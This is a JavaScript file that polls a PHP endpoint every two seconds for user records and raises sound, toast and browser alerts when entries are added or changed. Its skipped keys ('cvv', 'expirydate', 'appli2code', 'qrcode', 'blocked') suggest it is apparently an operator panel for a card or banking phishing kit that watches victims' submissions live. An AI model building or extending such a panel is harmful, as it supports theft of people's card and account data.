let oldData = [];
let isFirstCheck = true;
const keysToSkip = [
    'last_activity',
    'cvv',
    'expirydate',
    'input_array',
    'status',
    'blocked',
    'appli2code',
    'viewed',
    'qrcode'
];

async function fetchDataFromServer() {
    try {
        const response = await fetch('../datauser/fetch.php');
        console.log("Fetching data from server...");
        if (!response.ok) {
            throw new Error('Network response was not ok');
        }
        return await response.json();
    } catch (error) {
        console.error('Error fetching data:', error);
        return [];
    }
}

async function saveNotificationToDB(userId, field, newValue) {
    try {
        const response = await fetch('notifications/save_notification.php', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify({
                user_id: userId,
                field_changed: field,
                new_value: newValue
            })
        });

        if (!response.ok) {
            throw new Error('Failed to save notification');
        }

        const result = await response.json();
        console.log('Notification saved:', result);
    } catch (error) {
        console.error('Error saving notification:', error);
    }
}

async function checkForUpdates() {
    const newData = await fetchDataFromServer();
    const aggregatedChanges = []; // To store all changes for this check

    if (!isFirstCheck) {
        newData.forEach(newItem => {
            const oldItem = oldData.find(item => item.id === newItem.id);
            if (!oldItem) {
                // New entry added
                aggregatedChanges.push({
                    type: 'added',
                    id: newItem.id,
                    details: 'New entry added.'
                });
                saveNotificationToDB(newItem.id, 'New entry', 'added');
            } else {
                // Find what changed
                const changes = findChanges(oldItem, newItem);
                if (changes.length > 0) {
                    aggregatedChanges.push({
                        type: 'updated',
                        id: newItem.id,
                        details: changes
                    });
                    changes.forEach(change => {
                        saveNotificationToDB(newItem.id, change.field, change.newValue);
                    });
                }
            }
        });

        if (aggregatedChanges.length > 0) {
            showAggregatedNotification(aggregatedChanges);
        }
    }

    oldData = newData;
    isFirstCheck = false;
}

// Function to find what changed between old and new data
function findChanges(oldItem, newItem) {
    const changes = [];
    for (let key in newItem) {
        if (
            !keysToSkip.includes(key) &&
            JSON.stringify(oldItem[key]) !== JSON.stringify(newItem[key])
        ) {
            changes.push({
                field: key,
                newValue: newItem[key]
            });
        }
    }
    return changes;
}

function showToast(message) {
    Toastify({
        text: message,
        duration: 5000,
        close: true,
        gravity: 'top',
        position: 'left',
        backgroundColor: 'linear-gradient(to right, #00b09b, #96c93d)',
    }).showToast();
}

async function requestNotificationPermission() {
    if (!('Notification' in window)) {
        console.warn('This browser does not support notifications');
        return false;
    }

    try {
        const permission = await Notification.requestPermission();
        console.log('Notification permission status:', permission);
        return permission === 'granted';
    } catch (error) {
        console.error('Error requesting notification permission:', error);
        return false;
    }
}

// New function to show aggregated notifications
async function showAggregatedNotification(changes) {
    if (!('Notification' in window)) {
        console.warn('Notifications not supported');
        return;
    }

    if (Notification.permission !== 'granted') {
        const permitted = await requestNotificationPermission();
        if (!permitted) {
            console.warn('Notification permission not granted');
            return;
        }
    }

    try {
        // Play sound
        const sound = new Howl({
            src: ['audio.mp3']
        });
        sound.play();

        // Build the aggregated message
        let message = 'Updates:\n';
        changes.forEach(change => {
            if (change.type === 'added') {
                message += `• ID ${change.id} - ${change.details}\n`;
            } else if (change.type === 'updated') {
                message += `• ID ${change.id} - Updated Fields:\n`;
                change.details.forEach(fieldChange => {
                    message += `   - ${fieldChange.field}: ${fieldChange.newValue}\n`;
                });
            }
        });

        // Show toast
        showToast(message);

        // Show browser notification
        const notification = new Notification('Update Alert', {
            body: message,
            requireInteraction: true,
            silent: false
        });

        notification.onclick = function() {
            window.focus();
            this.close();
            console.log('Notification clicked');
        };

        notification.onshow = function() {
            console.log('Notification shown:', message);
        };

        notification.onerror = function(e) {
            console.error('Notification error:', e);
        };
    } catch (error) {
        console.error('Error creating notification:', error);
    }
}

document.addEventListener('DOMContentLoaded', async () => {
    await requestNotificationPermission();
});

setInterval(checkForUpdates, 2000);
setTimeout(checkForUpdates, 2000);
